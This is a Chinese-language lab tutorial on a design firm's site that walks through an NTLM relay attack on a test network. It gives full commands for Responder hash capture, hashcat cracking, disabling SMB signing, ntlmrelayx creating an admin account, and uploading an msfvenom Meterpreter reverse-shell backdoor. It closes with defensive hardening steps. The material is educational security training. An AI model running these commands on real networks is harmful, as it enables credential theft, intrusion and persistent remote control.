尧图网站设计 尧图网站设计YAOTU DESIGN
ARTICLE DETAIL

资讯详情

深耕网站设计与一线实操的经验洞察。

NET-NTLM-relay攻击

NET-NTLM-relay攻击 安全声明本实验仅用于内网安全学习、网络安全攻防实训严禁在未授权的企业、个人、公网设备上实施此类攻击私自对他人服务器、电脑进行 NTLM 中继攻击、窃取 Hash、植入木马属于违法犯罪行为。一、实验基础信息1. 实验目的掌握 Net-NTLM Hash 字段组成、NTLM 认证全过程理解 LLMNR/NBT-NS 投毒、NTLM Relay 中继攻击原理熟练使用 Responder、hashcat、ntlmrelayx、MSF 全套攻击工具掌握 NTLM 漏洞对应的危害、防御加固方案。2. 实验环境表格设备系统IP角色攻击机Kali Linux192.168.5.128劫持、抓 Hash、中继、木马生成监听客户端Windows 7192.168.5.129被投毒主动泄露 NTLMv2 Hash靶机服务器Windows Server 2012192.168.5.130中继攻击目标关闭 SMB 签名存在漏洞网络三台设备同局域网无防火墙拦截 LLMNR、SMB (445)、HTTP (80) 端口3. 工具用处总览Responder劫持局域网 LLMNR/NBT-NS 解析请求诱导 Windows 主机主动上传 Net-NTLMv2 哈希hashcat使用字典暴力破解捕获的 NTLM 哈希还原账户明文密码ntlmrelayx.pyImpacketNTLM 中继工具转发窃取到的合法凭证在靶机执行命令、上传木马msfvenom生成 Windows 反向远控木马msfconsole handler监听木马回连获取靶机 Meterpreter 最高权限。4. 漏洞整体危害内网攻击者无需密码即可劫持内网主机 NTLM 认证凭证哈希可被暴力破解直接拿到管理员明文账号密码目标服务器关闭 SMB 签名时可中继凭证横向移动接管域内服务器可远程新增管理员账号、植入后门木马实现长期持久控制企业内网一旦沦陷可批量窃取服务器业务数据、勒索、破坏系统。二、步骤实验 1Responder 抓取 Win7 Net-NTLMv2 Hash操作 1.1 Kali 查看网卡启动 Responder 劫持工具操作步骤输入ip a查看网卡确认 eth0 内网 IP 为 192.168.5.128执行命令sudo responder -I eth0 -d -v-I eth0绑定内网网卡-d开启 LLMNR/NBT-NS/MDNS 投毒-v输出详细日志实时查看抓 Hash 过程。图片注解界面打印 Responder 启动 LOGO代表劫持服务成功运行持续监听局域网内名称解析流量。操作 1.2 Win7 客户端触发解析请求操作步骤Win7 按下快捷键WinR打开运行窗口输入\\192.168.5.128点击确定。图片注解Windows 访问不存在的 SMB 共享会自动发起 LLMNR 名称解析Responder 伪造应答强制客户端提交 NTLM 身份凭证。操作 1.3 Kali 捕获完整 NTLMv2 Hash操作步骤等待 Win7 访问后Responder 自动输出完整哈希字符串。图片注解NTLMv2-SSP Client泄露 Hash 的 Win7 客户端 IPNTLMv2-SSP Username本地管理员账户 AdministratorNTLMv2 Hash可用于爆破的完整哈希值格式适配 hashcat -m 5600。操作 1.4 解压字典将 Hash 写入爆破文件操作步骤解压内置字典gunzip /usr/share/wordlists/rockyou.txt.gz提示重复输入 y 覆盖echo 复制捕获的完整Hash hash.txt把哈希存入文件。图片注解两条命令分别完成字典解压、哈希文件生成为后续 hashcat 爆破做准备。实验 2hashcat 爆破 NTLM 哈希还原明文密码操作 2.1 执行 hashcat 爆破命令操作步骤执行爆破命令bashhashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt --force参数说明-m 5600指定哈希类型为 NetNTLMv2--force忽略硬件驱动警告强制运行。图片注解加载显卡、哈希、字典资源初始化爆破内核准备开始字典比对。操作 2.2 查看爆破结束结果操作步骤等待工具跑完全部字典查看结果。图片注解Status: Exhausted字典全部遍历完毕Recovered:0/1当前 rockyou 字典未匹配到明文密码可更换更大字典二次爆破记录爆破时长、运算速度、硬件占用。实验 3Windows Server2012 关闭 SMB 签名漏洞前置条件操作步骤右键 CMD选择【以管理员身份运行】依次输入 4 条注册表命令关闭 SMB 签名cmdreg add HKLM\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters /v RequireSecuritySignature /t REG_DWORD /d 0 /f reg add HKLM\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters /v EnableSecuritySignature /t REG_DWORD /d 0 /f reg add HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v EnableSecuritySignature /t REG_DWORD /d 0 /f reg add HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v RequireSecuritySignature /t REG_DWORD /d 0 /fshutdown /r /t 0立即重启服务器生效。图片注解4 条注册表命令关闭客户端、服务端 SMB 签名校验关闭后 NTLM 中继攻击才能成功转发凭证是本漏洞核心前提。关闭 SMB 签名的危害服务器失去 SMB 数据包签名校验攻击者转发伪造的 NTLM 认证数据包不会被拦截直接通过服务器身份验证非法获取管理员权限。实验 4ntlmrelayx 中继攻击新增管理员账号控制靶机操作 4.1 清理端口占用启动中继脚本 ntlmrelayx.py操作步骤清理占用 80/445 端口进程避免冲突bashpkill -f responder pkill -f ntlmrelayx pkill -f apache2 netstat -tulnp | grep -E 445|80启动中继攻击命令新建管理员账号 hack​ python3 /usr/share/doc/python3-impacket/examples/ntlmrelayx.py -smb2support -t 192.168.5.130 -c net user hack 123456 /add net localgroup administrators hack /add ​参数-t指定靶机 Server2012 IP-c中继成功后在靶机执行创建管理员账户命令。图片注解脚本加载 SMB、HTTP、WINRM 服务开启监听等待 Win7 客户端的 NTLM 凭证。操作 4.2 新开终端启动 Responder 劫持流量操作步骤新建 Kali 终端执行sudo responder -I eth0 -v。图片注解中继工具与 Responder 必须分两个终端运行Responder 负责劫持 Win7 解析请求将认证流量转发给 ntlmrelayx 完成中继。操作 4.3 Win7 再次触发访问完成凭证转发操作步骤重复 Win7WinR输入\\192.168.5.128访问。图片注解Windows 再次发起名称解析Responder 劫持并转发 NTLM 管理员凭证至靶机服务器。操作 4.4 中继执行命令成功获取服务器权限操作步骤无需额外操作等待中继脚本执行命令。实验 5MSF 生成木马中继上传后门实现持久远控操作 5.1 生成反向木马、启动 MSF 监听、启动带上传功能的中继操作步骤生成 Windows 反向木马bashmsfvenom -p windows/meterpreter/reverse_tcp LHOST192.168.5.128 LPORT4444 -f exe -o backdoor.exe打开 msfconsole 配置监听bashuse exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.5.128 set LPORT 4444 run另起终端启动可上传木马的中继bashpython3 /usr/share/doc/python3-impacket/examples/ntlmrelayx.py -smb2support -remove-mic -t 192.168.5.130 -e backdoor.exe-e参数中继成功后自动上传并执行 exe 木马。图片注解依次完成木马生成、MSF 监听部署、带文件上传功能的中继启动三层工具配合完成远控攻击。操作 5.2 中继上传木马、注册系统服务完整攻击日志操作步骤Win7 再次访问\\192.168.5.128触发劫持自动上传并运行后门。图片注解攻击流程接收 Win7 连接NTLM 凭证中继校验通过自动上传后门 exe 到靶机临时目录创建自定义 Windows 系统服务注册后门程序启动服务执行木马自动删除木马文件清除痕迹木马反向连接 Kali 的 MSF 监听获取 Meterpreter 最高交互式权限。三、常见故障及解决方案故障 1Address already in use 端口占用Win7 访问提示无法访问原因Responder、ntlmrelayx、apache2 抢占 80/445 端口解决攻击前批量 kill 相关进程先启动 ntlmrelayx再新开终端运行 Responder。故障 2木马上传、服务创建成功但 MSF 无会话上线原因MSF 监听与中继脚本共用终端中断、木马 LHOST/LPORT 配置错误、防火墙拦截解决终端 1 常驻 MSF 监听终端 2 单独运行中继核对木马 IP 端口关闭 Kali 防火墙放行 4444 端口。四、NTLM Relay 漏洞防御策略1. 强制开启 SMB 签名核心防御所有 Windows 服务器、域控组策略强制启用 SMB 签名阻断中继转发伪造数据包组策略路径计算机配置 - 安全设置 - 本地策略 - 安全选项启用两条策略服务器启用 SMB 服务器数字签名客户端启用 SMB 客户端数字签名注册表永久加固批量部署reg add HKLM\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters /v RequireSecuritySignature /t REG_DWORD /d 1 /f reg add HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v RequireSecuritySignature /t REG_DWORD /d 1 /f2. 禁用 LLMNR、NBT-NS 名称解析阻断投毒源头组策略关闭 LLMNR计算机配置 - 网络 - DNS 客户端关闭 “启用 LLMNR”禁用 TCP/IP 上的 NetBIOS彻底关闭 NBT-NS 协议内网部署 DNS 服务器统一域名解析消除广播解析漏洞。3. 账户安全加固管理员账户设置高强度复杂密码定期更换限制本地管理员权限普通员工禁止本地管理员权限开启账户锁定策略防止 Hash 暴力破解。4. 内网网络防护内网划分 VLAN隔离办公终端与业务服务器防火墙拦截内网不必要的 SMB 445 端口横向访问部署 EDR 终端检测工具监控异常 SMB 连接、陌生系统服务、未知 exe 程序自启动。5. 系统补丁更新及时安装 Windows 对应 NTLM 协议安全补丁关闭 MIC 校验绕过漏洞
返回列表